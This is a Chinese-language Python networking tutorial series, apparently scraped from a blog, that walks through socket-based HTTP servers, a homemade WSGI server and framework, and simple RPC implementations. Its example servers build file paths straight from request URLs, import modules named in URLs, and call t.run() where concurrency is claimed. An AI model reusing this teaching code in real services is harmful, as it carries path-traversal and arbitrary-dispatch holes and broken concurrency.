tcp_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
# 绑定端口
tcp_socket.bind(('', 8080))
# 监听
tcp_socket.listen()
# 等待
client_socket, client_address = tcp_socket.accept()
# 收发消息
with client_socket:
print(f"[来自{client_address}的消息:\n")
msg = client_socket.recv(2048)
if msg:
print(msg.decode("utf-8"))
client_socket.send(
"""HTTP/1.1 200 ok\r\nContent-Type: text/html;charset=utf-8\r\n\r\n<h1>哈哈哈</h1>"""
.encode("utf-8"))
if __name__ == "__main__":
main()
from socket import SOL_SOCKET, SO_REUSEADDR
from socketserver import ThreadingTCPServer, BaseRequestHandler
class MyHandler(BaseRequestHandler):
def handle(self):
print(f"[来自{self.client_address}的消息:]")
data = self.request.recv(2048)
print(data)
self.request.send(
"HTTP/1.1 200 ok\r\nContent-Type: text/html;charset=utf-8\r\n\r\n<h1>小明,晚上吃鱼汤吗?</h1>"
.encode("utf-8"))
def main():
# bind_and_activate=False 手动绑定和激活
with ThreadingTCPServer(('', 8080), MyHandler, False) as server:
# 防止端口占用
server.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
server.server_bind() # 自己绑定
server.server_activate() # 自己激活
server.serve_forever()
if __name__ == "__main__":
main()
解决前:
解决后:
这个就涉及到TCP4次挥手
相关的内容了,如果不是长连接,你先断开客户端,再断开服务端就不会遇到这个问题了,具体问题下次继续探讨~
虽然简化了,但有时候也会出现端口占用的情况(很少出现
)
from socket import SOL_SOCKET, SO_REUSEADDR
from socketserver import ThreadingTCPServer, BaseRequestHandler
class MyHandler(BaseRequestHandler):
def handle(self):
print(f"[来自{self.client_address}的消息:]")
data = self.request.recv(2048)
print(data)
self.request.send(
"HTTP/1.1 200 ok\r\nContent-Type: text/html;charset=utf-8\r\n\r\n<h1>小明,晚上吃鱼汤吗?</h1>"
.encode("utf-8"))
def main():
# 防止端口占用
ThreadingTCPServer.allow_reuse_address = True
with ThreadingTCPServer(('', 8080), MyHandler) as server:
server.serve_forever()
if __name__ == "__main__":
main()
源码比较简单,一看就懂:
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
BaseServer.__init__(self, server_address, RequestHandlerClass)
self.socket = socket.socket(self.address_family,
self.socket_type)
if bind_and_activate:
try:
# 看这
self.server_bind()
self.server_activate()
except:
self.server_close()
raise
def server_bind(self):
# 看这
if self.allow_reuse_address:
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
self.server_address = self.socket.getsockname()
下级预估:Linux 5种 IO模型
(这边的Select
也是其中的一种)
关于编码风格改变的说明:https://www.cnblogs.com/dotnetcrazy/p/10024818.html
借着SocketServer
的灵感,再结合OOP
,来一个简单案例:
import socket
class WebServer(object):
def __init__(self):
with socket.socket() as tcp_socket:
# 防止端口占用
tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 绑定端口
tcp_socket.bind(('', 8080))
# 监听
tcp_socket.listen()
# 等待客户端连接
while True:
self.client_socket, self.client_addr = tcp_socket.accept()
self.handle()
def handle(self):
with self.client_socket:
print(f"[来自{self.client_addr}的消息:")
data = self.client_socket.recv(2048)
if data:
print(data.decode("utf-8"))
self.client_socket.send(
b"HTTP/1.1 200 ok\r\nContent-Type: text/html;charset=utf-8\r\n\r\n<h1>Web Server Test</h1>"
)
if __name__ == "__main__":
WebServer()
效果:
下面就自己手写几种服务器并测试一下,先贴结果再细看
安装:sudo apt install jmeter
使用三步走:
额外说下开始的配置:
对上面服务器简单测试下:(实际结果只会比我老电脑性能高)
PS:文件读取rb
模式:请求可能是图片之类的
import os
import re
import socketserver
class MyHandler(socketserver.BaseRequestHandler):
# 处理请求
def handle(self):
with self.request:
print(f"[来自{self.client_address}的消息:")
data = self.request.recv(2048)
if data:
msg, _ = data.decode("utf-8").split("\r\n", 1)
self.respose(msg)
# 相应浏览器
def respose(self, msg):
# GET (/xxx.html) HTTP/1.1
# 不匹配开头结尾也行:re.match("[^/]+(/[^ ]*).+", msg)
filename = "/index.html"
ret = re.match("^[^/]+(/[^ ]*).+$", msg)
if ret:
page = ret.group(1) # 请求页面
if not page == "/":
filename = page
# 获取本地文件
data = self.read_file(filename)
# 回复浏览器
self.request.send(
b"HTTP/1.1 200 ok\r\nContent-Type: text/html;charset=utf-8\r\n\r\n"
)
self.request.send(data)
# 获取本地文件内容
def read_file(self, filename):
print("请求页面:", filename)
path = f"./root{filename}"
# 没有这个文件就定位到404页面
if not os.path.exists(path):
path = "./root/404.html"
print("本地路径:", path)
# 读取页面并返回
with open(path, "rb") as fs:
return fs.read()
if __name__ == "__main__":
socketserver.ThreadingTCPServer.allow_reuse_address = True
with socketserver.ThreadingTCPServer(('', 8080), MyHandler) as server:
server.serve_forever()
import os
import re
import socket
from multiprocessing import Process
class WebServer(object):
def __init__(self):
with socket.socket() as tcp_socket:
# 防止端口占用
tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 绑定端口
tcp_socket.bind(('', 8080))
# 监听
tcp_socket.listen()
# 等待客户端连接
while True:
self.client_socket, self.client_addr = tcp_socket.accept()
t = Process(target=self.handle)
t.daemon = True
t.run()
# 处理请求
def handle(self):
with self.client_socket:
print(f"[来自{self.client_addr}的消息:")
data = self.client_socket.recv(2048)
if data:
msg, _ = data.decode("utf-8").split("\r\n", 1)
self.respose(msg)
# 相应浏览器
def respose(self, msg):
# GET (/xxx.html) HTTP/1.1
# 不匹配开头结尾也行:re.match("[^/]+(/[^ ]*).+", msg)
filename = "/index.html"
ret = re.match("^[^/]+(/[^ ]*).+$", msg)
if ret:
page = ret.group(1) # 请求页面
if not page == "/":
filename = page
# 获取本地文件
data = self.read_file(filename)
# 回复浏览器
self.client_socket.send(
b"HTTP/1.1 200 ok\r\nContent-Type: text/html;charset=utf-8\r\n\r\n"
)
self.client_socket.send(data)
# 获取本地文件内容
def read_file(self, filename):
print("请求页面:", filename)
path = f"./root{filename}"
# 没有这个文件就定位到404页面
if not os.path.exists(path):
path = "./root/404.html"
print("本地路径:", path)
# 读取页面并返回
with open(path, "rb") as fs:
return fs.read()
if __name__ == "__main__":
WebServer()
之前有讲过multiprocessing.dummy
的Process
其实是基于线程的,就不再重复了
来个多线程版的:(其实就把multiprocessing.dummy
换成了multiprocessing
)
import os
import re
import socket
from multiprocessing.dummy import Process
class WebServer(object):
def __init__(self):
with socket.socket() as tcp_socket:
# 防止端口占用
tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 绑定端口
tcp_socket.bind(('', 8080))
# 监听
tcp_socket.listen()
# 等待客户端连接
while True:
self.client_socket, self.client_addr = tcp_socket.accept()
t = Process(target=self.handle)
t.daemon = True
t.run()
# 处理请求
def handle(self):
with self.client_socket:
print(f"[来自{self.client_addr}的消息:")
data = self.client_socket.recv(2048)
if data:
msg, _ = data.decode("utf-8").split("\r\n", 1)
self.respose(msg)
# 相应浏览器
def respose(self, msg):
# GET (/xxx.html) HTTP/1.1
# 不匹配开头结尾也行:re.match("[^/]+(/[^ ]*).+", msg)
filename = "/index.html"
ret = re.match("^[^/]+(/[^ ]*).+$", msg)
if ret:
page = ret.group(1) # 请求页面
if not page == "/":
filename = page
# 获取本地文件
data = self.read_file(filename)
# 回复浏览器
self.client_socket.send(
b"HTTP/1.1 200 ok\r\nContent-Type: text/html;charset=utf-8\r\n\r\n"
)
self.client_socket.send(data)
# 获取本地文件内容
def read_file(self, filename):
print("请求页面:", filename)
path = f"./root{filename}"
# 没有这个文件就定位到404页面
if not os.path.exists(path):
path = "./root/404.html"
print("本地路径:", path)
# 读取页面并返回
with open(path, "rb") as fs:
return fs.read()
if __name__ == "__main__":
WebServer()
演示图示:
这个比较简单,并发编程中的协程篇有讲,这边简单说下:
import gevent
from gevent import monkey
monkey
不在__all__
中,需要自己导入monkey.patch_all()
打个补丁gevent.spawn(方法名,参数)
import os
import re
import socket
import gevent
from gevent import monkey # monkey不在__all__中,需要自己导入
# 》》》看这
monkey.patch_all() # 打补丁
class WebServer(object):
def __init__(self):
with socket.socket() as tcp_socket:
# 防止端口占用
tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 绑定端口
tcp_socket.bind(('', 8080))
# 监听
tcp_socket.listen()
# 等待客户端连接
while True:
self.client_socket, self.client_addr = tcp_socket.accept()
# 》》》看这
t = gevent.spawn(self.handle)
t.daemon = True
t.run()
# 处理请求
def handle(self):
with self.client_socket:
print(f"[来自{self.client_addr}的消息:")
data = self.client_socket.recv(2048)
if data:
msg, _ = data.decode("utf-8").split("\r\n", 1)
self.respose(msg)
# 相应浏览器
def respose(self, msg):
# GET (/xxx.html) HTTP/1.1
# 不匹配开头结尾也行:re.match("[^/]+(/[^ ]*).+", msg)
filename = "/index.html"
ret = re.match("^[^/]+(/[^ ]*).+$", msg)
if ret:
page = ret.group(1) # 请求页面
if not page == "/":
filename = page
# 获取本地文件
data = self.read_file(filename)
# 回复浏览器
self.client_socket.send(
b"HTTP/1.1 200 ok\r\nContent-Type: text/html;charset=utf-8\r\n\r\n"
)
self.client_socket.send(data)
# 获取本地文件内容
def read_file(self, filename):
print("请求页面:", filename)
path = f"./root{filename}"
# 没有这个文件就定位到404页面
if not os.path.exists(path):
path = "./root/404.html"
print("本地路径:", path)
# 读取页面并返回
with open(path, "rb") as fs:
return fs.read()
if __name__ == "__main__":
WebServer()
下次会进入网络的深入篇
上节回顾:5种IO模型 | IO多路复用
官方文档:https://docs.python.org/3/library/internet.html
画一张图来通俗化讲讲TCP三次握手:
用代码来说,大概过程就是:
画图通俗讲下TCP四次挥手:
用代码来说,大概过程就是:
其实这个也很好的解释了之前的端口占用问题,如果是服务端先断开连接,那么服务器就是四次挥手的发送方,
最后一次消息是得不到回复的,端口就会保留一段时间
(服务端的端口固定)也就会出现端口占用的情况。如果是客户端先断开,那下次连接会自动换个端口,不影响(客户端的端口是随机分配的)
PS:之前我们讲端口就是send
一个空消息,很多人不是很清楚,这边简单验证下就懂了:
之前其实已经写了个简版的Web服务器了,简单回顾下流程:
TCP三次握手
send
一个http的请求报文,服务器接recv
之后进行相应的处理并返回对应的页面client close
),进行了TCP四次挥手
然后简单说下HTTP状态码:
baidu.com
=302=> www.baidu.com
404 not found
500 Server Error
WSGI
)¶我们先自己定义一个动态服务器:
import re
import socket
class HTTPServer(object):
def __init__(self):
with socket.socket() as tcp_server:
tcp_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
tcp_server.bind(('', 8080))
tcp_server.listen()
while True:
self.client_socket, self.client_address = tcp_server.accept()
self.handle()
def response(self, status, body=None):
print(status)
header = f"HTTP/1.1 {status}\r\n\r\n"
with self.client_socket:
self.client_socket.send(header.encode("utf-8"))
if body:
self.client_socket.send(body)
def __static_handler(self, name):
try:
with open(f"./www{name}", "rb") as fs:
return fs.read()
except Exception as ex:
print(ex)
return None
def __dynamic_handler(self, name):
try:
m = __import__(name)
return m.application().encode("utf-8")
except Exception as ex:
print(ex)
return None
def handle(self):
with self.client_socket:
print(f"[来自{self.client_address}的消息:]\n")
data = self.client_socket.recv(2048)
if data:
header, _ = data.decode("utf-8").split("\r\n", 1)
print(header)
# GET /xxx HTTP/1.1
ret = re.match("^\w+? (/[^ ]*) .+$", header)
if ret:
url = ret.groups(1)[0]
# Python三元表达式(之前好像忘说了)
url = "/index.html" if url == "/" else url
print("请求url:", url)
body = str()
# 动态页面
if ".py" in url:
# 提取模块名(把开头的/和.py排除)
body = self.__dynamic_handler(url[1:-3])
else: # 静态服务器
body = self.__static_handler(url)
# 根据返回的body内容,返回对应的响应码
if body:
self.response("200 ok", body)
else:
self.response("404 Not Found")
else: # 匹配不到url(基本上不会发生,不排除恶意修改)
self.response((404, "404 Not Found"))
if __name__ == "__main__":
import sys
# 防止 __import__ 导入模块的时候找不到,忘了可以查看:
# https://www.cnblogs.com/dotnetcrazy/p/9253087.html#5.自己添加模块路径
sys.path.insert(1, "./www/bin")
HTTPServer()
效果:
代码不难其中有个技术点说下:模块名为字符串怎么导入
?
# test.py
# 如果模块名是字符串,需要使用__import__
s = "time"
time = __import__(s)
def application():
return time.ctime() # 返回字符串
if __name__ == "__main__":
time_str = application()
print(type(time_str))
print(time_str)
输出:
<class 'str'>
Thu Dec 20 22:48:07 2018
和上面基本一样,多了个路由表(self.router_urls
)而已
import re
import socket
class HttpServer(object):
def __init__(self):
# 路由表
self.router_urls = {"/test": "/test.py", "/user": "/test2.py"}
def run(self):
with socket.socket() as server:
# 端口复用
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(("", 8080))
server.listen()
while True:
self.client_socket, self.client_address = server.accept()
print(f"[{self.client_address}已上线]")
self.handler()
def response(self, status, body=None):
with self.client_socket as socket:
header = f"HTTP/1.1 {status}\r\n\r\n"
socket.send(header.encode("utf-8"))
if body:
socket.send(body)
def __static_handler(self, name):
try:
with open(f"./www{name}", "rb") as fs:
return fs.read()
except Exception as ex:
print(ex)
return None
def __dynamic_handler(self, name):
try:
m = __import__(name)
return m.application().encode("utf-8")
except Exception as ex:
print(ex)
return None
def handler(self):
data = self.client_socket.recv(2048)
if data:
header, _ = data.decode("utf-8").split("\r\n", 1)
# GET /xxx HTTP/1.1
ret = re.match("^\w+? (/[^ ]*) .+$", header)
if ret:
url = ret.group(1)
print(url) # print url log
body = None
# 路由有记录:动态页面
if url in self.router_urls.keys():
url = self.router_urls[url]
# 切片提取模块名
body = self.__dynamic_handler(url[1:-3])
else: # 静态服务器
if url == "/":
url = "/index.html"
body = self.__static_handler(url)
# 没有这个页面或者出错
if body:
self.response("200 ok", body)
else:
self.response("404 Not Found")
else:
# 404
self.response("404 Not Found")
else:
print(f"{self.client_address}已下线")
self.client_socket.close()
if __name__ == "__main__":
import sys
# 临时添加模块所在路径
sys.path.insert(1, "./www/bin")
HttpServer().run()
输出:
看一眼test2.py
:
# test2.py
def application():
return "My Name Is XiaoMing"
if __name__ == "__main__":
print(application())
官方文档:https://docs.python.org/3/library/wsgiref.html
其实Python官方提供了一个WSGI:Web Server Gateway Interface
的约定:
它只要求Web开发者实现一个
application
函数,就可以响应HTTP请求
eg:(只要对应的python文件提供了 application(env,start_response)
方法就行了)
# hello.py
# env 是一个字典类型
def application(env, start_response):
# 设置动态页面的响应头(回头服务器会再加上自己的响应头)
# 列表里面的 item 是 tuple
start_response("200 OK", [("Content-Type", "text/html")])
# 返回一个列表
return ["<h1>This is Test!</h1>".encode("utf-8")]
先使用官方的简单服务器看看:
from wsgiref.simple_server import make_server
# 导入我们自己编写的application函数:
from hello import application
# 创建一个服务器,端口是8080,处理函数是application:
httpd = make_server('', 8080, application)
print('Serving HTTP on port 8080...')
# 开始监听HTTP请求:
httpd.serve_forever()
运行后效果:127.0.0.1:8080
This is Test!
如果把hello.py
改成下面代码(服务端不变),那么就可以获取一些请求信息了:
def application(env, start_response):
print(env["PATH_INFO"])
start_response("200 OK", [("Content-Type", "text/html")])
return [f'<h1>Hello, {env["PATH_INFO"][1:] or "web"}!</h1>'.encode("utf-8")]
输出:
上面的application()
函数就是符合WSGI
标准的一个HTTP处理函数
,它接收两个参数:
environ
:一个包含所有HTTP请求信息的dict
对象;start_response
:一个发送HTTP响应的函数(调用服务器定义的方法)Header
只能发送一次 ==> 只能调用一次start_response()
函数有了WSGI
,我们关心的就是如何从env
这个dict
对象拿到HTTP请求信息
,然后构造HTML
,通过start_response()
发送Header
,最后返回Body内容
Python内置了一个WSGI
服务器,这个模块叫wsgiref
,它是用纯Python
编写的WSGI
服务器的参考实现(完全符合WSGI
标准,但是不考虑任何运行效率,仅供开发和测试使用)
PS:这样的好处就是,只要符合WSGI
规范的服务器,我们都可以直接使用了
其实通过源码就可以知道这个WSGIServer
到底是何方神圣了:
class WSGIServer(HTTPServer):
pass
# HTTPServer其实就是基于TCPServer
class HTTPServer(socketserver.TCPServer):
pass
# 这个就是我们开头说的Python封装的简单WebServer了
class TCPServer(BaseServer):
pass
如果还是记不得可以回顾下上次说的内容,提示:
__all__ = ["BaseServer", "TCPServer", "UDPServer",
"ThreadingUDPServer", "ThreadingTCPServer",
"BaseRequestHandler", "StreamRequestHandler",
"DatagramRequestHandler", "ThreadingMixIn"]
如果你想要在这个基础上进行处理,可以和上面说的一样,定义一个继承class WSGIRequestHandler(BaseHTTPRequestHandler)
的类,然后再处理
在本小节结束前我们模仿一下示例,定义一个符合WSGI
规范的简单服务器:
import re
import socket
from index import WebFrame
class WSGIServer(object):
def __init__(self):
# 请求头
self.env = dict()
# 存放处理后的响应头
self.response_headers = str()
def run(self):
with socket.socket() as server:
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(("", 8080))
server.listen()
while True:
self.client_socket, self.client_address = server.accept()
self.handler()
# 转换浏览器请求头格式
def request_headers_handler(self, headers):
# 过滤一下空字符串(不能过滤空列表)
headers = list(filter(None, headers.split("\r\n")))
# 提取 Method 和 Url
ret = re.match("^([\w]+?) (/[^ ]*?) .+$", headers[0])
if ret:
self.env["method"] = ret.group(1)
url = ret.group(2)
print(url)
self.env["path"] = "/index.html" if url == "/" else url
else:
return None
# [['Host', ' localhost:8080'], ['Connection', ' keep-alive']...]
array = map(lambda item: item.split(":", 1), headers[1:])
for item in array:
self.env[item[0].lower()] = item[1]
# print(self.env)
return "ok"
# 响应客户端(吐槽一下,request和response的headers为毛格式不一样,这设计真不合理!)
def start_response(self, status, header_list=[]):
# 响应头
self.response_headers = f"HTTP/1.1 {status}\r\n"
for item in header_list:
self.response_headers += f"{item[0]}:{item[1]}\r\n"
# print(self.response_headers)
# 响应浏览器
def response(self, body):
with self.client_socket as client:
# 省略一系列服务器响应的headers
self.response_headers += "server:WSGIServer\r\n\r\n"
client.send(self.response_headers.encode("utf-8"))
if body:
client.send(body)
def handler(self):
with self.client_socket as client:
data = client.recv(2048)
if data:
# 浏览器请求头
headers = data.decode("utf-8")
if self.request_headers_handler(headers):
# 模仿php所有请求都一个文件处理
body = WebFrame().application(self.env,
self.start_response)
# 响应浏览器
self.response(body)
else:
self.start_response("404 Not Found")
else:
client.close()
if __name__ == "__main__":
WSGIServer().run()
自己定义的框架:
class WebFrame(object):
def __init__(self):
# 路由表
self.router_urls = {"/time": "get_time", "/user": "get_name"}
def get_time(self):
import time
return time.ctime().encode("utf-8")
def get_name(self):
return "<h2>My Name Is XiaoMing</h2>".encode("utf-8")
def application(self, env, start_response):
body = b""
url = env["path"]
# 请求的页面都映射到路由对应的方法中
if url in self.router_urls.keys():
func = self.router_urls[url]
body = getattr(self, func)()
else:
# 否则就请求对应的静态资源
try:
with open(f"./www{url}", "rb") as fs:
body = fs.read()
except Exception as ex:
start_response("404 Not Found")
print(ex)
return b"404 Not Found" # 出错就直接返回了
# 返回对应的页面响应头
start_response("200 ok", [("Content-Type", "text/html"),
("Scripts", "Python")])
return body
输出:
知识扩展:
从wsgiref模块导入
https://docs.python.org/3/library/wsgiref.html
Python服务器网关接口
https://www.python.org/dev/peps/pep-3333/
Python原始套接字和流量嗅探
https://blog.csdn.net/cj1112/article/details/51303021
https://blog.csdn.net/peng314899581/article/details/78082244
【源码阅读】轻量级Web框架:bottle
https://github.com/bottlepy/bottle
上篇回顾:万物互联之~深入篇
其他专栏最新篇:协程加强之~兼容答疑篇 | 聊聊数据库~SQL环境篇
Code:https://github.com/lotapp/BaseCode/tree/master/python/6.net/6.rpc/
RPC
(Remote Procedure Call
):分布式系统常见的一种通信方法(远程过程调用),通俗讲:可以一台计算机的程序调用另一台计算机的子程序(可以把它看成之前我们说的进程间通信,只不过这一次的进程不在同一台PC上了)
PS:RPC
的设计思想是力图使远程调用中的通讯细节对于使用者透明,调用双方无需关心网络通讯的具体实现
引用一张网上的图:
和HTTP
有点相似,你可以这样理解:
HTTP/1.0
是短链接,而RPC
是长连接进行通信HTTP/1.1
支持了长连接(Connection:keep-alive
),基本上和RPC
差不多了keep-alive
一般都限制有最长时间,或者最多处理的请求数,而RPC
是基于长连接的,基本上没有这个限制HTTP/2.0
建立了gRPC
,它们之间的基本上也就差不多了HTTP-普通话
和RPC-方言
的区别了RPC
和HTTP
调用不用经过中间件,而是端到端的直接数据交互Socket
实现的(RPC
、HTTP
都是Socket
的读写操作)简单概括一下RPC
的优缺点就是:
PS:HTTP更多是Client
与Server
的通讯;RPC
更多是内部服务器间的通讯
上面说这么多,可能还没有来个案例实在,我们看个案例:
本地调用sum()
:
def sum(a, b):
"""return a+b"""
return a + b
def main():
result = sum(1, 2)
print(f"1+2={result}")
if __name__ == "__main__":
main()
输出:(这个大家都知道)
1+2=3
官方文档:
https://docs.python.org/3/library/xmlrpc.client.html
https://docs.python.org/3/library/xmlrpc.server.html
都说RPC
用起来就像本地调用一样,那么用起来啥样呢?看个案例:
服务端:(CentOS7:192.168.36.123:50051
)
from xmlrpc.server import SimpleXMLRPCServer
def sum(a, b):
"""return a+b"""
return a + b
# PS:50051是gRPC默认端口
server = SimpleXMLRPCServer(('', 50051))
# 把函数注册到RPC服务器中
server.register_function(sum)
print("Server启动ing,Port:50051")
server.serve_forever()
客户端:(Win10:192.168.36.144
)
from xmlrpc.client import ServerProxy
stub = ServerProxy("http://192.168.36.123:50051")
result = stub.sum(1, 2)
print(f"1+2={result}")
输出:(Client
用起来是不是和本地差不多?就是通过代理访问了下RPCServer
而已)
1+2=3
PS:CentOS
服务器不是你绑定个端口就一定能访问的,如果不能记让防火墙开放对应的端口
这个之前在说MariaDB
环境的时候有详细说:https://www.cnblogs.com/dotnetcrazy/p/9887708.html#_map4
# 添加 --permanent永久生效(没有此参数重启后失效)
firewall-cmd --zone=public --add-port=80/tcp --permanent
zeroRPC用起来和这个差不多,也简单举个例子吧:
把服务的某个方法注册到RPCServer
中,供外部服务调用
import zerorpc
class Test(object):
def say_hi(self, name):
return f"Hi,My Name is{name}"
# 注册一个Test的实例
server = zerorpc.Server(Test())
server.bind("tcp://0.0.0.0:50051")
server.run()
调用服务端代码:
import zerorpc
client = zerorpc.Client("tcp://192.168.36.123:50051")
result = client.say_hi("RPC")
print(result)
看了上面的引入案例,是不是感觉RPC
不过如此?NoNoNo,要是真这么简单也就谈不上RPC架构
了,上面两个是最简单的RPC服务了,可以这么说:生产环境基本上用不到,只能当案例练习罢了,对Python来说,最常用的RPC就两个gRPC
and Thrift
PS:国产最出名的是Dubbo
and Tars
,Net最常用的是gRPC
、Thrift
、Surging
要自己实现一个RPC Server
那么就得了解整个流程了:
Client
(调用者)以本地调用的方式发起调用RPC
服务进行远程过程调用(RPC的目标就是要把这些步骤都封装起来,让使用者感觉不到这个过程)RPC Proxy
组件收到调用后,负责将被调用的方法名、参数
等打包编码成自定义的协议RPC Proxy
组件在打包完成后通过网络把数据包发送给RPC Server
RPC Proxy
组件把通过网络接收到的数据包按照相应格式进行拆包解码
,获取方法名和参数RPC Proxy
组件根据方法名和参数进行本地调用RPC Server
(被调用者)本地执行后将结果返回给服务端的RPC Proxy
RPC Proxy
组件将返回值打包编码成自定义的协议数据包,并通过网络发送给客户端的RPC Proxy
组件RPC Proxy
组件收到数据包后,进行拆包解码,把数据返回给Client
Client
(调用者)得到本次RPC
调用的返回结果用一张时序图来描述下整个过程:
PS:RPC Proxy
有时候也叫Stub
(存根):(Client Stub,Server Stub)
为屏蔽客户调用远程主机上的对象,必须提供某种方式来模拟本地对象,这种本地对象称为存根(stub),存根负责接收本地方法调用,并将它们委派给各自的具体实现对象
PRC服务实现的过程中其实就两核心点:
Protocol Buffers
TCP/UDP/HTTP
)下面我们就根据上面的流程来手写一个简单的RPC:
1.Client调用:
# client.py
from client_stub import ClientStub
def main():
stub = ClientStub(("192.168.36.144", 50051))
result = stub.get("sum", (1, 2))
print(f"1+2={result}")
result = stub.get("sum", (1.1, 2))
print(f"1.1+2={result}")
time_str = stub.get("get_time")
print(time_str)
if __name__ == "__main__":
main()
输出:
1+2=3
1.1+2=3.1
Wed Jan 16 22
2.Client Stub,客户端存根:(主要有打包
、解包
、和RPC服务器通信
的方法)
# client_stub.py
import socket
class ClientStub(object):
def __init__(self, address):
"""address ==> (ip,port)"""
self.socket = socket.socket()
self.socket.connect(address)
def convert(self, obj):
"""根据类型转换成对应的类型编号"""
if isinstance(obj, int):
return 1
if isinstance(obj, float):
return 2
if isinstance(obj, str):
return 3
def pack(self, func, args):
"""打包:把方法和参数拼接成自定义的协议
格式:func:函数名@params:类型-参数,类型2-参数2...
"""
result = f"func:{func}"
if args:
params = ""
# params:类型-参数,类型2-参数2...
for item in args:
params += f"{self.convert(item)}-{item},"
# 去除最后一个,
result += f"@params:{params[:-1]}"
# print(result) # log 输出
return result.encode("utf-8")
def unpack(self, data):
"""解包:获取返回结果"""
msg = data.decode("utf-8")
# 格式应该是"data:xxxx"
params = msg.split(":")
if len(params) > 1:
return params[1]
return None
def get(self, func, args=None):
"""1.客户端的RPC Proxy组件收到调用后,负责将被调用的方法名、参数等打包编码成自定义的协议"""
data = self.pack(func, args)
# 2.客户端的RPC Proxy组件在打包完成后通过网络把数据包发送给RPC Server
self.socket.send(data)
# 等待服务端返回结果
data = self.socket.recv(2048)
if data:
return self.unpack(data)
return None
简要说明下:(我根据流程在Code里面标注了,看起来应该很轻松)
之前有说到核心其实就是消息协议
and传输控制
,我客户端存根
的消息协议是自定义的格式(后面会说简化方案):func:函数名@params:类型-参数,类型2-参数2...
,传输我是基于TCP进行了简单的封装
3.Server端:(实现很简单)
# server.py
import socket
from server_stub import ServerStub
class RPCServer(object):
def __init__(self, address, mycode):
self.mycode = mycode
# 服务端存根(RPC Proxy)
self.server_stub = ServerStub(mycode)
# TCP Socket
self.socket = socket.socket()
# 端口复用
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 绑定端口
self.socket.bind(address)
def run(self):
self.socket.listen()
while True:
# 等待客户端连接
client_socket, client_addr = self.socket.accept()
print(f"来自{client_addr}的请求:\n")
try:
# 交给服务端存根(Server Proxy)处理
self.server_stub.handle(client_socket, client_addr)
except Exception as ex:
print(ex)
if __name__ == "__main__":
from server_code import MyCode
server = RPCServer(('', 50051), MyCode())
print("Server启动ing,Port:50051")
server.run()
为了简洁,服务端代码我单独放在了server_code.py
中:
# 5.RPC Server(被调用者)本地执行后将结果返回给服务端的RPC Proxy
class MyCode(object):
def sum(self, a, b):
return a + b
def get_time(self):
import time
return time.ctime()
4.然后再看看重头戏Server Stub
:
# server_stub.py
import socket
class ServerStub(object):
def __init__(self, mycode):
self.mycode = mycode
def convert(self, num, obj):
"""根据类型编号转换类型"""
if num == "1":
obj = int(obj)
if num == "2":
obj = float(obj)
if num == "3":
obj = str(obj)
return obj
def unpack(self, data):
"""3.服务端的RPC Proxy组件把通过网络接收到的数据包按照相应格式进行拆包解码,获取方法名和参数"""
msg = data.decode("utf-8")
# 格式应该是"格式:func:函数名@params:类型编号-参数,类型编号2-参数2..."
array = msg.split("@")
func = array[0].split(":")[1]
if len(array) > 1:
args = list()
for item in array[1].split(":")[1].split(","):
temps = item.split("-")
# 类型转换
args.append(self.convert(temps[0], temps[1]))
return (func, tuple(args)) # (func,args)
return (func, )
def pack(self, result):
"""打包:把方法和参数拼接成自定义的协议"""
# 格式:"data:返回值"
return f"data:{result}".encode("utf-8")
def exec(self, func, args=None):
"""4.服务端的RPC Proxy组件根据方法名和参数进行本地调用"""
# 如果没有这个方法则返回None
func = getattr(self.mycode, func, None)
if args:
return func(*args) # 解包
else:
return func() # 无参函数
def handle(self, client_socket, client_addr):
while True:
# 获取客户端发送的数据包
data = client_socket.recv(2048)
if data:
try:
data = self.unpack(data) # 解包
if len(data) == 1:
data = self.exec(data[0]) # 执行无参函数
elif len(data) > 1:
data = self.exec(data[0], data[1]) # 执行带参函数
else:
data = "RPC Server Error Code:500"
except Exception as ex:
data = "RPC Server Function Error"
print(ex)
# 6.服务端的RPC Proxy组件将返回值打包编码成自定义的协议数据包,并通过网络发送给客户端的RPC Proxy组件
data = self.pack(data) # 把函数执行结果按指定协议打包
# 把处理过的数据发送给客户端
client_socket.send(data)
else:
print(f"客户端:{client_addr}已断开\n")
break
再简要说明一下:里面方法其实主要就是解包
、执行函数
、返回值打包
输出图示:
再贴一下上面的时序图:
课外拓展:
HTTP1.0、HTTP1.1 和 HTTP2.0 的区别
https://www.cnblogs.com/heluan/p/8620312.html
简述分布式RPC框架
https://blog.csdn.net/jamebing/article/details/79610994
分布式基础—RPC
http://www.dataguru.cn/article-14244-1.html
下节预估:RPC服务进一步简化与演变、手写一个简单的REST接口
上篇回顾:万物互联之~RPC专栏 https://www.cnblogs.com/dunitian/p/10279946.html
之前有网友问,很多开源的RPC中都是使用路由表,这个怎么实现?
其实路由表实现起来也简单,代码基本上不变化,就修改一下server_stub.py
的__init__
和exe
两个方法就可以了:
class ServerStub(object):
def __init__(self, mycode):
self.func_dict = dict()
# 初始化一个方法名和方法的字典({func_name:func})
for item in mycode.__dir__():
if not item.startswith("_"):
self.func_dict[item] = getattr(mycode, item)
def exec(self, func, args=None):
"""4.服务端的RPC Proxy组件根据方法名和参数进行本地调用"""
# 如果没有这个方法则返回None
# func = getattr(self.mycode, func, None)
func = self.func_dict[func]
if args:
return func(*args) # 解包
else:
return func() # 无参函数
Python比较6的同志对上节课的Code肯定嗤之以鼻,上次自定义协议是同的通用方法,这节课我们先来简化下代码:
再贴一下上节课的时序图:
官方文档:https://docs.python.org/3/library/json.html
# 把字典对象转换为Json字符串
json_str = json.dumps({"func": func, "args": args})
# 把Json字符串重新变成字典对象
data = json.loads(data)
func, args = data["func"], data["args"]
需要注意的就是类型转换了(eg:python tuple
==> json array
)
Python | JSON |
---|---|
dict | object |
list, tuple | array |
